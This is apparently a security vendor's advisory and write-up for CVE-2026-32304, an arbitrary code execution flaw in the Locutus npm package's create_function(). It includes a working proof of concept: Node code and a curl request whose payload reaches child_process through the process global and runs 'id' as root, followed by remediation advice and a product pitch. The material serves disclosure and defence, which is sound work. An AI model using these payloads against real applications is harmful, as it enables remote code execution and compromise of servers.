
June 4, 2026

CVE-2026-32304 — Locutus create_function Remote Code Execution Vulnerability

1. Introduction & CVE Overview

The Locutus library’s create_function() implementation passes its two caller-supplied strings, the parameter list and the function body, straight to JavaScript’s Function constructor, so any application that lets attacker-influenced data reach either argument hands that attacker arbitrary code execution in the Node.js process. This mirrors PHP’s create_function(), which was deprecated in 7.2 and removed in 8.0 for the same reason.

Field Details

CVE ID: CVE-2026-32304
Affected Software: Locutus (npm package), specifically the php/funchand/create_function component, in all versions up to and including 3.0.13
Attack Vector: Any application code path, remote or local, that passes attacker-controlled strings to create_function(); the library itself exposes no network endpoint, so reachability is determined entirely by the calling application
Root Cause: The function builds a new JavaScript Function object from both parameters without any validation or sandboxing
Exploit Status: CONFIRMED

2. Vulnerability Description

Locutus vulnerable to RCE via unsanitized input in create_function()

Summary

The create_function(args, code) function passes both parameters directly to the Function constructor without any sanitization, allowing arbitrary code execution.

This is distinct from CVE-2026-29091 (GHSA-fp25-p6mj-qqg6) which was call_user_func_array using eval() in v2.x. This finding affects create_function using new Function() in v3.x.

Root Cause

src/php/funchand/create_function.ts:17:

return new Function(...params, code)

Zero input validation on either parameter.

PoC

const { create_function } = require('locutus/php/funchand/create_function');
// Functions built by new Function() see only the global scope. `require` is global in the
// Node REPL, where this runs as written; in a CommonJS file it is a module-wrapper parameter,
// so a payload there has to reach child_process through the `process` global instead
// (that is the chain used in section 4).
const rce = create_function('', 'return require("child_process").execSync("id").toString()');
console.log(rce());
// Output: uid=501(user) gid=20(staff) ...

Confirmed on locutus v3.0.11, Node.js v24.13.1.

Impact

Full RCE when an attacker can control either argument to create_function(). 597K weekly npm downloads.

Suggested Fix

Remove create_function or replace new Function() with a safe alternative. PHP itself deprecated create_function() in PHP 7.2 for the same reason.

Response

We confirmed that php/funchand/create_function was still present through locutus@3.0.13 and that it exposed dynamic code execution via new Function(...).

While this was intended behavior (create_function() inherently needs to be unsafe in order for it to work), create_function() was deprecated in PHP 7.2 and removed in PHP 8.0. Given that Locutus’ parity target today is 8.3, this function shouldn’t have been in Locutus at all anymore.

We fixed this in locutus@3.0.14 by removing php/funchand/create_function entirely. That matches our PHP 8.3 parity target more closely.

We also updated php/var/var_export so closures now export using the PHP 8-style \Closure::__set_state(array(...)) form instead of referencing the removed API.

Release:


3. Impact

Successful exploitation grants code execution with the privileges of the Node.js process: the attacker can run system commands, read secrets and files, modify the filesystem, or establish persistence. Exploitability depends entirely on the calling application. Locutus does not expose create_function() over the network itself, so the vulnerability is reachable only where application code passes attacker-influenced strings (request bodies, query parameters, stored data) to either argument; web applications and APIs that do so are the severe case. Given Locutus’ 597K weekly npm downloads, the exposure across dependents is significant. A network-reachable instance, requiring no privileges or user interaction and yielding full confidentiality, integrity and availability impact, maps to CVSS 3.1 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), i.e. Critical.


4. Proof of Concept

Exploit Request (sent to a local test harness on port 8819 that hands the args and code fields to create_function())

curl -X POST \
  -H 'Content-Type: application/json' \
  --data-binary @- \
  'http://localhost:8819/eval' <<'EOF'
{"args": "", "code": "return this.constructor.constructor('return process')().mainModule.require('child_process').execSync('id').toString();"}
EOF

The body is fed through a quoted heredoc because the payload's own single quotes would otherwise terminate a single-quoted -d argument. The payload avoids require() (not a global inside a Function body) and instead reaches child_process through the process global: this === globalThis, globalThis.constructor is Object, Object.constructor is Function, and Function('return process')() yields the process object.

Raw Request Object

{
  "method": "POST",
  "url": "http://localhost:8819/eval",
  "headers": {
    "Content-Type": "application/json"
  },
  "body": {
    "args": "",
    "code": "return this.constructor.constructor('return process')().mainModule.require('child_process').execSync('id').toString();"
  }
}

5. Server Response Evidence

Status Code: 200
Response Body: "result":"uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n"
Indicator: uid=0(root) (the test service ran as root, so the injected command executed with full host privileges)

6. Screenshots — Exploitation Proof

No screenshots were captured for this CVE.


7. Remediation

Upgrade to Locutus 3.0.14 or later, which removes php/funchand/create_function entirely. The upgrade is a hard break: any remaining require or import of that module fails with a module-not-found error, so locate call sites before upgrading. Replace each use with a statically defined function or a closure selected from a fixed set; do not rebuild the behaviour with eval() or new Function(). Audit for indirect use as well: before 3.0.14, php/var/var_export emitted create_function(...) strings when exporting closures, so check any stored or serialised var_export output that is evaluated later. If dynamic code evaluation cannot be removed, isolate it: run the process with Node's --disallow-code-generation-from-strings flag, which makes eval() and new Function() throw, or move the evaluation into a separate least-privilege sandboxed process. A browser Content Security Policy does not protect server-side Node.js code. Finally, review other dependencies to ensure none reintroduces the same string-to-code pattern.


8. Stay Ahead of Threats

Vulnerabilities like CVE-2026-32304 are discovered and weaponised faster than ever. MITRAL — Hiperlinx Security’s Attack Surface Management platform — continuously monitors your environment and adds new detection rules every day, giving you real-time coverage for emerging CVEs customised to your specific technology stack.

Request a free demo or start your free trial →

Have questions or need a tailored security assessment?
Open a request with the Hiperlinx team →